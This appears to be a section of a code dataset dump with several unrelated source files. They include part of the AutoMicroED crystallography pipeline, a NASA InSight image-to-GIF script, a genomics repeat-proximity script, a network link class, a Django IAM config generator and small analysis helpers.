/home/kimd999/bin/ccp4/ccp4-7.1/bin\n \n (save by Ctrl-x-s for mac keyboard)\n (exit emacs by Ctrl-x-c for mac keyboard)\n '''\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n exit(1)\n ################ check cad, f2mtz, shelxt, shelxl path\n \n process = \" Automatic MicroED\"\n show_header(process)\n start_time = time.time()\n \n path_before_opening_list_of_mrc_file_or_smv_folder = os.getcwd()\n\n if (args_dict['input_list_has_mrc'] == True):\n if (\n ('Bypass_movie_inspection' not in args_dict.keys()) \n or (args_dict['Bypass_movie_inspection'].upper() == \"F\")\n or (args_dict['Bypass_movie_inspection'].upper() == \"FALSE\")\n ):\n check_movie_quality()\n\n ############### args_dict['sections']) > 1 (e.g. mrcs input)\n if (int(args_dict['sections']) > 1): \n\n mrc_file_list_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n mrc_file_number = 0\n for mrc_file in mrc_file_list_opened:\n mrc_w_path = mrc_file.rstrip()\n #write_this = \"mrc_file:\" + str(mrc_file)\n #flog_wo_print(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (mrc_file == \"\\n\") or (mrc_file == \"\"):\n continue\n \n mrc_file_number = mrc_file_number + 1\n if (platform.system() == \"Linux\"):\n \n mrc_file_basename = os.path.basename(mrc_file)\n intermediate_output_folder_name = os.path.splitext(mrc_file_basename)[0]\n \n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n os.mkdir(\"xds\")\n os.mkdir(\"img\")\n os.chdir(\"img\")\n \n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n \n if (more_crystal_needed == \"failed\"):\n exit(1)\n elif (more_crystal_needed == \"CORRECT.LP not found\"):\n write_this = \"[xds] CORRECT.LP not found even after many troubleshootings.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n else:\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == True):\n write_this = \"AutoMicroED will feed more mrcs file (if any).\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n \n if (more_crystal_needed == False):\n break\n \n else: # macOS\n mrc_file_basename = os.path.basename(mrc_file)\n write_this = \"mrc_file_basename:\" + str(mrc_file_basename)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n intermediate_output_folder_name = os.path.splitext(mrc_file_basename)[0]\n \n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n \n os.mkdir(\"xds\")\n \n os.mkdir(\"img\")\n os.chdir(\"img\")\n \n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == -999):\n exit(1)\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n if (more_crystal_needed == False):\n break\n mrc_file_list_opened.close()\n ######### end of for mrc_file in mrc_file_or_smv_folder_opened\n \n if (mrc_file_number == 0):\n write_this = \"mrc_file_number = 0. Please populate mrc_list first.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n \n if (more_crystal_needed != \"no CORRECT.LP found\"):\n write_this = \"more_crystal_needed after looping through list_of_mrc_file_or_smv_folder: \" + str(more_crystal_needed)\n args_dict['more_crystal_needed'] = more_crystal_needed\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n else:\n print_this = \"xds needs to be re-ran with other approach/data. Please analyze xds_XXX.log files.\\n\"\n print_this = print_this + \"For example, xds binary might have been expired like \\\"Sorry, license expired on 31-Mar-2022\\\"\"\n \n print (print_this)\n exit(1)\n ############### args_dict['sections']) > 1 (e.g. mrcs input)\n\n\n ############### single frame mrc (e.g. individual mrc)\n else: # (args_dict['sections']) == 1)\n mrc_file_number = 0\n mrc_file_or_smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n \n more_crystal_needed = None\n for mrc_file in mrc_file_or_smv_folder_opened:\n mrc_w_path = mrc_file.rstrip()\n \n if (mrc_file == \"\\n\") or (mrc_file == \"\"):\n continue\n \n if (mrc_w_path.find('.mrc') == -1):\n print_this = str(mrc_w_path) + \" doesn't have .mrc.\\nPerhaps, a user entered args_file rather than mrc.list?\\n\"\n print_this = print_this + \" AutoMicroED exits now.\\n\"\n print (print_this)\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n \n if (os.path.isfile(mrc_w_path) == False):\n print_this = str(mrc_w_path) + \" doesn't exist. AutoMicroED exits now.\\n\"\n print (print_this)\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n \n mrc_file_number = mrc_file_number + 1\n \n base_mrc_name = os.path.basename(mrc_w_path)\n splited_base_mrc_name = base_mrc_name.split(\".mrc\")\n splited_base_mrc_name2 = splited_base_mrc_name[0].split(\"_\")\n image_num = int(splited_base_mrc_name2[len(splited_base_mrc_name2)-1])\n \n if (image_num <= 3): # Irina doesn't like to use first 3 images\n continue\n \n mrc_file_basename = os.path.basename(mrc_w_path)\n intermediate_output_folder_name = mrc_file_basename[:-9]\n \n # (Note) because of this, single frame mrc_file can be processed similarly as multi frame mrc_file\n if (os.path.isdir(intermediate_output_folder_name) == False):\n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n print (os.getcwd())\n \n if (os.path.isdir(\"xds\") == False):\n os.mkdir(\"xds\")\n \n if (os.path.isdir(\"img\") == False):\n os.mkdir(\"img\")\n os.chdir(\"img\")\n \n \n print_this = \"(single column) mrc file that is used for xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections:\" + str(mrc_w_path)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n if (more_crystal_needed == \"no CORRECT.LP found\"):\n flog(\"no CORRECT.LP found\", args_dict['logfile_name_w_abs_path'])\n elif (more_crystal_needed == \"Running xds failed.\"):\n flog(\"Running xds failed. Please analyze xds.log files.\", args_dict['logfile_name_w_abs_path'])\n exit(1)\n else:\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == True):\n write_this = \"AutoMicroED will feed more individual mrc (column=1) file (if there are any).\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n\n if (more_crystal_needed == -999):\n exit(1)\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n if (more_crystal_needed == False):\n break\n \n mrc_file_or_smv_folder_opened.close()\n \n if (mrc_file_number == 0):\n write_this = \"mrc_file_number = 0. Please populate mrc_list first.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n \n if more_crystal_needed == None:\n print (\"more_crystal_needed is not defined. Maybe xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections never ran since # of each mrc < 4\")\n exit(1)\n\n args_dict['more_crystal_needed'] = more_crystal_needed\n if (more_crystal_needed != \"no CORRECT.LP found\"):\n write_this = \"more_crystal_needed after looping through list_of_mrc_file_or_smv_folder: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n else:\n print_this = \"xds needs to be re-ran with other approach/data.\"\n print (print_this)\n exit(1)\n ############### single frame mrc (e.g. individual mrc)\n \n\n else: # input_list_has_mrc == False (such as smv/img file)\n smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n for each_smv_folder in smv_folder_opened:\n each_smv_folder = each_smv_folder.rstrip()\n\n write_this = \"each_smv_folder:\" + str(each_smv_folder)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n #/gpustorage/MicroEDProc/SMP/CycA_SBGrid/752/20181220-112002/img/\n\n if (each_smv_folder == \"\\n\") or (each_smv_folder == \"\"):\n continue\n\n for each_img_file in os.listdir(each_smv_folder):\n if each_img_file.endswith(\".img\") or each_img_file.endswith(\".smv\"):\n prefix_of_img_file = each_img_file[:len(each_img_file)-9]\n args_dict['prefix_of_img_file'] = prefix_of_img_file\n break\n\n if (each_smv_folder[len(each_smv_folder)-1]) == \"/\":\n each_smv_folder = each_smv_folder[:len(each_smv_folder)-1]\n\n intermediate_output_folder_name = each_smv_folder.split('/')[-2]\n #print (fintermediate_output_folder_name:{intermediate_output_folder_name}\")\n # smv only -> 165749merged\n \n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n \n os.mkdir(\"xds\")\n os.mkdir(\"img\")\n os.chdir(\"img\")\n\n command = \"cp \" + str(each_smv_folder).rstrip() + \"/*.img .\"\n print(command)\n os.system(command)\n\n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n if (more_crystal_needed == \"failed\"):\n exit(1)\n elif (more_crystal_needed == \"CORRECT.LP not found\"):\n write_this = \"[xds] CORRECT.LP not found even after many troubleshootings.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n elif (more_crystal_needed == \"Running xds failed.\"):\n flog(\"Running xds failed. Please analyze xds.log files.\", args_dict['logfile_name_w_abs_path'])\n exit(1)\n else:\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == True):\n write_this = \"AutoMicroED will feed more smv/img file (if there are any).\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n \n if (more_crystal_needed == False):\n break\n\n smv_folder_opened.close()\n #### end of for each_smv_folder in smv_folder_opened:\n\n if (more_crystal_needed != \"no CORRECT.LP found\"):\n write_this = \"bool(more_crystal_needed) after looping through list_of_mrc_file_or_smv_folder: \" + str(more_crystal_needed)\n args_dict['more_crystal_needed'] = more_crystal_needed\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n else:\n print_this = \"xds needs to be re-ran with other approach/data.\"\n print (print_this)\n exit(1)\n ####end of else: # input_list_has_mrc == False (such as smv and img file)\n\n\n\n ###### Common for stack and single frame mrc \n # (after xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections)\n\n returned_from_generate_each_SPACE_GROUP_folder = generate_each_SPACE_GROUP_folder(args_dict)\n if (returned_from_generate_each_SPACE_GROUP_folder == False):\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n\n\n\n if (\"outdir\" not in args_dict):\n print_this = \"\\noutdir is not defined in args_file\\n\"\n print_this = print_this + \"Either specify it args_file (for later AutoMicroED run)\\n\"\n print_this = print_this + \"or enter here (for example full_range_xds).\"\n print_this = print_this + \"\\n\\tRefer (git repo)/templates/args_file/explanation_of_args.txt for an example of outdir\"\n print (print_this)\n\n\n #Thread(target = wait_10_seconds).start()\n answer = receive_from_user(\"outdir\") \n if answer != None:\n args_dict['outdir'] = answer\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n else:\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n # common regardless whether user specified outdir or not\n os.chdir(\"..\")\n new_working_folder_abs_path = os.path.abspath(working_folder)\n\n command = \"mv \" + str(working_folder_abs_path) + \" \" + str(new_working_folder_abs_path)\n os.system(command)\n\n\n\n\n exit(1)\n \n dir_before_entering_each_SPACE_GROUP = os.getcwd()\n for SPACE_GROUP_folder in glob.glob(\"SPACE_GROUP_*\"):\n print_this = \"SPACE_GROUP_folder:\" + str(SPACE_GROUP_folder)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n\n os.chdir(SPACE_GROUP_folder)\n \n generate_each_similar_UNIT_CELL_folder(args_dict)\n \n dir_per_SPACE_GROUP = os.getcwd()\n print (\"directory per_SPACE_GROUP:\" + str(dir_per_SPACE_GROUP))\n \n for entry in os.scandir('.'):\n if not entry.name.startswith('.') and entry.is_dir():\n cwd = os.getcwd()\n print (\"cwd:\" + str(cwd))\n os.chdir(entry.name)\n \n return_from_run_xscale_to_merge = xscale.run_xscale_to_merge(args_dict) \n # just \"merge\" even if current_completeness <= target\n if (return_from_run_xscale_to_merge == False):\n exit(1)\n \n result_of_phasing = phasing(args_dict) # phasing seems to be needed to be ran per each UNIT_CELL folder\n if (result_of_phasing == False):\n write_this = \"\\t\\tPhasing was not successful.\\n\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n exit(1)\n else:\n write_this = \"\\t\\tPhasing was successful.\\n\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n \n if ((str(args_dict['protein']).upper() == \"TRUE\") \\\n or (str(args_dict['protein']).upper() == \"T\")):\n return_from_phenix_refine_fn = protein.phenix_refine_fn(args_dict)\n \n os.chdir(dir_per_SPACE_GROUP)\n \n os.chdir(dir_before_entering_each_SPACE_GROUP)\n\n \n closing_remark(args_dict)\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n ###### Common for stack and single frame mrc\n \n\n ###### final organization\n os.chdir(working_folder_abs_path)\n \n os.mkdir(\"archive\")\n \n\n command = \"cp \" + str(args_dict['args_file_w_abs_path']) + \" archive/user_specified_args_file.txt\"\n os.system(command)\n\n command = \"cp \" + str(list_of_mrc_file_or_smv_folder_w_abs_path) + \" archive/user_entered_mrc_list.txt\"\n os.system(command)\n\n all_folders = os.listdir()\n for folder in all_folders:\n if \"archive\" in folder:\n pass\n elif \"SPACE_\" in folder:\n pass\n elif \"summary.log\" in folder:\n pass\n else:\n command = \"mv \" + str(folder) + \" archive\"\n os.system(command)\n \n command = \"mv archive/user_* .\"\n os.system(command)\n ###### final organization\n\n\n if (\"outdir\" not in args_dict):\n print_this = \"\\noutdir is not defined in args_file\\n\"\n print_this = print_this + \"Either specify it args_file (for later AutoMicroED run)\\n\"\n print_this = print_this + \"or enter here (for example full_range_xds).\"\n print_this = print_this + \"\\n\\tRefer (git repo)/templates/args_file/explanation_of_args.txt for an example of outdir\"\n print (print_this)\n\n\n #Thread(target = wait_10_seconds).start()\n answer = receive_from_user(\"outdir\") \n if answer != None:\n args_dict['outdir'] = answer\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n else:\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n # common regardless whether user specified outdir or not\n os.chdir(\"..\")\n new_working_folder_abs_path = os.path.abspath(working_folder)\n\n command = \"mv \" + str(working_folder_abs_path) + \" \" + str(new_working_folder_abs_path)\n os.system(command)\n","repo_name":"pnnl/AutoMicroED","sub_path":"run_all.py","file_name":"run_all.py","file_ext":"py","file_size_in_byte":31019,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"450413877","text":"from pathlib import Path\n\nimport pandas as pd\n\n\nclass Overview:\n def __init__(self, overview):\n if type(overview) == str:\n self.overview = pd.read_csv(Path(overview))\n elif type(overview) == pd.DataFrame:\n self.overview = overview\n else:\n raise TypeError(f'Should be dataframe like object, received {type(overview)}')\n\n def __getitem__(self, args):\n if len(args) == 2:\n ngt_id, speaker_id = args\n else:\n raise ValueError(f'Invalid number of arguments: {len(args)} (should be 2)')\n\n return Path(self.overview.loc[\n (self.overview['session_id'] == ngt_id) & (self.overview['speaker_id'] == speaker_id),\n 'media_path'\n ].iloc[0])\n","repo_name":"Casvanrijbroek/Sign-Language-Thesis","sub_path":"utils/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73198616361","text":"cockroach = genMonster(\"Cockroach\", (284, 8593), \"a cockroach\")\ncockroach.setTargetChance(0)\ncockroach.bloodType(\"slime\")\ncockroach.setHealth(1)\ncockroach.setExperience(0)\ncockroach.setSpeed(200) #incorrect\ncockroach.walkAround(1,1,1) # energy, fire, poison\ncockroach.setBehavior(summonable=200, hostile=0, illusionable=1, convinceable=200, pushable=1, pushItems=0, pushCreatures=0, targetDistance=0, runOnHealth=1)\ncockroach.setImmunity(0,0,0) # paralyze, invisible, lifedrain\ncockroach.setDefense(0, fire=1.0, earth=1.0, energy=1.0, ice=1.0, holy=1.0, death=1.0, physical=1.0, drown=1.0)\ncockroach.loot( (\"cockroach leg\", 100.0) )","repo_name":"novasdream/PyOT","sub_path":"data/monsters/Arthropods/Insects/Cockroach.py","file_name":"Cockroach.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7687369466","text":"### Gets X number of images from InSight Mars Lander from NASA.gov\n\n### Args:\n### n = number of images starting from the current one backwards\n### out = output directory\n\nimport argparse\nimport subprocess\nimport os\nimport signal\nimport time\nimport shutil\nfrom insightmars import InSightAPI, utils\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fps', \"-f\", help='GIF speed', required=True)\nparser.add_argument('--output', \"-o\", help='Output gif name', required=True)\nparser.add_argument('--size', \"-s\", help='Output gif size (WxH)')\nparser.add_argument('--camera', \"-c\", help='Camera: icc / idc', default=\"idc\")\nparser.add_argument('--textsize', \"-t\", help='Text size: default 40', default=\"40\")\nargs = parser.parse_args()\nInSightMission = InSightAPI(af=args.camera, per_page=\"400\")\njson_request = InSightMission.make_request()\nmetadata_images = InSightMission.get_images_metadata(json_request, InSightMission.get_count(json_request))\nimages = []\nmetadata = []\nfilenames = []\nfor index, image in enumerate(metadata_images):\n\timages.append(image[\"url\"])\n\tmetadata.append(image[\"title\"])\n\tfilenames.append(\"images/IMG_\" + str(index) + \".png\")\n\nmetadata.reverse()\nif os.path.exists(\"images\"):\n\tshutil.rmtree(\"images\")\nutils.download_image(images, \"images/\", order=\"sequential\")\nfor index, i in enumerate(filenames):\n\tcmd = [\"convert\",i,\"-pointsize\",args.textsize,\"-fill\",\"white\",\"-undercolor\",\"'#00000080'\",\"-gravity\",\"South\",\"-annotate\",\"+0+5\",metadata[index],i]\t\n\tp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tout, err = p.communicate()\n \nscale = \"\"\nif not args.size == None:\n\tscale = \"-vf scale=\" + args.size\np = subprocess.Popen(\"ffmpeg -y -f image2 -framerate \" + args.fps + \" -i images/IMG_%d.png \" + scale + \" \" + args.output, shell=True)\nout, err = p.communicate()\n\n#shutil.rmtree(\"images\")\n","repo_name":"KonradIT/insight-api","sub_path":"insight_make_gif_metadata.py","file_name":"insight_make_gif_metadata.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"75267584039","text":"# Find genetic elements nearby CATTCC repeat clusters.\n\nimport os, pysam, math, sys, tqdm\nimport pandas as pd\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\nfrom gen import gen\nimport plotting\n\nfrom utilities import extract_matching_strings, load_repeat_masker_data, get_fasta_faidx, generate_rna_dataframe\nfrom utilities import nearest_distance, filter_pandas, filter_similar_transcripts\nfrom utilities import load_bin_bam\n\n# Define file system.\ngenomes_dir ='/media/ngs/data/genomes/chm13_v1.0/'\n#genomes_dir ='/Users/franklin/Dropbox/TEAD_paper/data/genomics/chm13_v1.0/'\ngenome_fa = 'chm13.draft_v1.0.fasta'\ngenome = gen(genomes_dir, genome_fa)\n\n# Add repeat bin file.\ngenome.add_field('binned_repeats','binned_CATTCC.bed')\n\n# Add rna mapped to genome.\ngenome.add_field('rna','RNA_aligned.bam')\n\n# maximum distance between end of repeat and beginning of transcript:\nmax_distance=10**6\n\n# Filter binned data base on simple threshold. Counts/ kb.\nmotif_threshold = 15\nrepeat_data = load_bin_bam(genomes_dir+genome.binned_repeats)\nrepeat_data = filter_pandas(repeat_data, count=[2, math.inf])\nplotting.histplot(repeat_data['count'].values,'TEAD motifs/2kb', bin_count=150)\n\n# Looking at histograms of the data, there's basically three densities of TEAD motifs. Very low, and two high. Let's look\n# at data in each of these density ranges.\nlow_density=[0,70]\nmed_density=[70,150]\nhi_density =[150,math.inf]\n\n# Make a new column for classification.\nrepeat_data['class']=''\n# Label data by class.\nlow_data = (repeat_data['count'] > low_density[0]) & (repeat_data['count'] <= low_density[1])\nrepeat_data.loc[low_data,'class']='low'\nmed_data = (repeat_data['count'] > med_density[0]) & (repeat_data['count'] <= med_density[1])\nrepeat_data.loc[med_data,'class']='medium'\nhigh_data = (repeat_data['count'] > hi_density[0]) & (repeat_data['count'] <= hi_density[1])\nrepeat_data.loc[high_data,'class']='high'\n\n# Histogram by chromosome?\nplotting.histplot(repeat_data.loc[repeat_data['class'] == 'high', 'contig'], 'contig', title='high', label_rotation=45)\n\n# load genome.\nfasta = get_fasta_faidx( genome.base_dir+genome.genome_fa )\n# load aligned rna bam. **make sure to create bam file index: \"samtools index **.bam\"\nrna_bam = pysam.AlignmentFile(genome.base_dir+genome.rna)\n\n#Create a dataframe for total output.\ncolumn_names = ['contig','ref_start','ref_end','repeat_type','motif_counts','transcript_name', 'start_position', 'length', \\\n 'distance_to_repeat', 'gene_loc']\nL=list()\n\n# Loop over repeatmasker entries that match the sat3 repeats, get their center location in the assembly. Find the closest transcript(s).\nfor index, rep_row in tqdm(repeat_data.iterrows()):\n sat_start=rep_row['start']\n sat_end = rep_row['stop']\n # Search for RNAs within 'max_distance'.\n rna_search_range = [max(sat_start - max_distance, 0), min(sat_end + max_distance, fasta.get_reference_length(rep_row['contig']))]\n rna_matches = rna_bam.fetch(reference=rep_row['contig'], start=rna_search_range[0], end=rna_search_range[1])\n\n # iterate over reads, append to matches dataframe\n mini_list=list()\n positions=list()\n for read in rna_matches:\n distance2repeat, gene_loc = nearest_distance( [sat_start, sat_end], [read.reference_start, read.reference_end])\n mini_list.append([rep_row['contig'], rep_row['start'], rep_row['stop'], rep_row['class'], rep_row['count'], read.query_name, read.reference_start, read.query_length, distance2repeat, gene_loc])\n # keep track of positions for filtering out later.\n positions.append(read.positions)\n\n # Keep all matches.\n L.extend(mini_list)\n\n# Convert list to df.\nDATA=pd.DataFrame(L,columns=column_names)\n# Save DATA to file.\nDATA.to_csv(genome.base_dir+'/all_matches_'+str(max_distance)+'.dat', sep='\\t', index=False)\n\n# Test reading/fetching from sam file.\n#read = sat_bam.fetch(\"NC_000004.12\",1,50000)\n#for x in read:\n# print(str(x))\n\n\n\n\n","repo_name":"jmfrank/sat3","sub_path":"expression/find_nearby_genes.py","file_name":"find_nearby_genes.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1735628620","text":"from Node import Node,Host,Edge,Agg,Core\nfrom SystemParameters import SystemParameters\n\nclass Link:\n \n # Characterisation of Links\n #_type=0 -> hostEdgeLink\n #_type=1 -> edgeAggLink\n #_type=2 -> aggCoreLink\n #_type=3 -> coreAggLink\n #_type=4 -> aggEdgeLink\n #_type=5 -> edgeHostLink\n def __init__(self, _id, input, output, bandwidth, _type, bufferSize = 0, delay = 0 ):\n self._id = _id\n self.input = input\n self.output = output\n self.bandwidth = bandwidth\n self._type = _type\n self.bufferSize = bufferSize\n self.delay = delay\n\n self.bandwidthUtilized = 0\n self.flowList = []\n \n def addFlow(self, flow):\n self.flowList.append(flow)\n self.bandwidthUtilized += flow.bandwidth \n \n def removeFlow(self, flow):\n self.flowList.remove(flow)\n self.bandwidthUtilized -= flow.bandwidth\n \n def __repr__(self):\n if(self._type == 0):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 1):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 2):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 3):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 4):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n elif(self._type == 5):\n return '' %(\n self._id, self.input._id, self.output._id,\nself.bufferSize, self.delay, self.bandwidth, self.bandwidthUtilized,\nself.flowList)\n \n ","repo_name":"bidhovbizar/DCN-Simulation","sub_path":"PythonCode/Link.py","file_name":"Link.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6216488127","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.core.management import BaseCommand\nfrom mako.template import Template\n\nfrom auth.models.base_models import ActionConfig\n\nACTIONS_TEMP = Template(\n \"\"\"\n{\n \"system_id\": \"bk_bkdata\",\n \"operations\": [\n % for action in actions:\n {\n \"operation\": \"upsert_action\",\n \"data\": {\n \"id\": \"${action.action_id.replace('.', '-')}\",\n \"name\": \"${action.action_name}\",\n \"name_en\": \"${action.action_name_en}\",\n \"description\": \"${action.action_name}\",\n \"description_en\": \"${action.action_name_en}\",\n \"type\": \"view\",\n \"related_resource_types\": [\n {\n \"system_id\": \"bk_bkdata\",\n \"id\": \"${action.object_class.object_class}\",\n \"related_instance_selections\": [],\n \"selection_mode\": \"all\"\n }\n ],\n \"related_actions\": []\n }\n },\n % endfor\n ]\n}\n\"\"\"\n)\n\n\nclass Command(BaseCommand):\n help = \"This command is used to generate the iam configuration\"\n\n def add_arguments(self, parser):\n # Named (optional) arguments\n parser.add_argument(\"-t\", \"--target\", help=\"生成 IAM 对象,可选有 resource_type|action\")\n parser.add_argument(\"-i\", \"--typeid\", help=\"资源类型ID\")\n\n def handle(self, *args, **options):\n target = options[\"target\"]\n resource_group_id = options[\"typeid\"]\n\n if target == \"resource_group\":\n print(\"目前仅支持 target==action\")\n return\n\n iam_content = \"init....\"\n if target == \"action\":\n actions = ActionConfig.objects.filter(object_class=resource_group_id)\n iam_content = ACTIONS_TEMP.render(actions=actions)\n\n print(iam_content)\n\n def get_version(self):\n return \"1.0.0\"\n","repo_name":"Tencent/bk-base","sub_path":"src/api/auth/management/commands/generate_iam.py","file_name":"generate_iam.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"11817479793","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport statistics\n\ndata = pd.read_csv(\"agreed.csv\", sep=\",\")\na = data['s1tos2'].mean()\nb = data['s2tos1'].mean()\n\nprint(f'Mean for s1tos2: {a:.4f}')\nprint(f'Mean for s2tos1: {b:.4f}')\nam = (a+b)/2\nprint(f'Overall Mean for Agreed: {am:.4f}')\n\ns1tos2 = data['s1tos2'].tolist()\n\nres = statistics.pstdev(s1tos2)\nprint(f'Standard Deviation for Agreed: {res:.4f}')\n\nplt.figure('Agree')\nplt.title(\"Distribution of Agree\")\nplt.hist(s1tos2, 5)\nplt.show()\n\nprint(\"-----------------------\")\n\ndata = pd.read_csv(\"disagreed.csv\", sep=\",\")\na = data['s1tos2'].mean()\nb = data['s2tos1'].mean()\n\nprint(f'Mean for s1tos2: {a:.4f}')\nprint(f'Mean for s2tos1: {b:.4f}')\nam = (a+b)/2\nprint(f'Overall Mean for Disagreed: {am:.4f}')\n\ns1tos2 = data['s1tos2'].tolist()\n\nres = statistics.pstdev(s1tos2)\nprint(f'Standard Deviation for Disagreed: {res:.4f}')\n\nplt.figure('Disagree')\nplt.title(\"Distribution of Disagree\")\nplt.hist(s1tos2, 